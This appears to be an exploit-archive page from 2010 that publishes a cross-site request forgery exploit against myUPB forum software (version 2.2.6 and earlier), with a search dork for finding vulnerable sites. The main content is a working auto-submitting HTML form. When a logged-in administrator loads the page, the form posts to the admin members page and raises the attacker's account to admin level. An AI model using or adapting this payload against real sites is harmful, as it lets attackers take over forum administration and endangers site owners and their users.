Home / os / win7

myUPB <= v2.2.6 CSRF privilege escalation

Posted on 21 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>myUPB &lt;= v2.2.6 CSRF privilege escalation</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================
myUPB &lt;= v2.2.6 CSRF privilege escalation
=========================================


+-------------------------------------------------------------------------------------------------------------------------------+
|				 _______         __                ______     							|
|				|    |  |.--.--.|  |--..-----.    |      |.----..-----..--.--.--.				|
|				|       ||  |  ||    &lt; |  -__|    |   ---||   _||  -__||  |  |  |				|
|				|__|____||_____||__|__||_____|    |______||__|  |_____||________|				|
+-------------------------------------------------------------------------------------------------------------------------------+
| Name: myUPB &lt;= v2.2.6 CSRF privilege escalation										|
| Software: myUPB &lt;= v2.2.6													|
| Site: http://www.myupb.com													|
| Download: http://sourceforge.net/projects/textmb/files/UPB/									|
| Vulnerability: CSRF privilege escalation											|
| Severity: medium ( low / medium / high )											|
| Tested on: 2.2.6														|
| Dork: &quot;Powered by myUPB&quot;													|
+-------------------------------------------------------------------------------------------------------------------------------+
| Author: Lord-Anubis														|
| Contact: lord.anu bis4[at]gm ail[dot]com											|
| Date: 20.06.2010 ( dd.mm.yyyy )												|
| Site: http://lordanubis.altervista.org/											|
+-------------------------------------------------------------------------------------------------------------------------------+
| Exploit:															|
+-------------------------------------------------------------------------------------------------------------------------------+
&lt;form method='POST' action=&quot;http://[site]/[path]/admin_members.php?action=edit&amp;id=[yourId]&amp;page=1&quot;&gt;
&lt;input type='hidden' name='a' value='1'&gt;
&lt;input type='hidden' name='level' value='3'&gt;
&lt;input type='hidden' name='email' size='20' value='anubis@hacker.zz' /&gt;
&lt;input type='hidden' value='Submit' name='B1' /&gt;
&lt;/form&gt;
&lt;script&gt;document.body.onload = document.forms[0].submit();&lt;/script&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-21]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :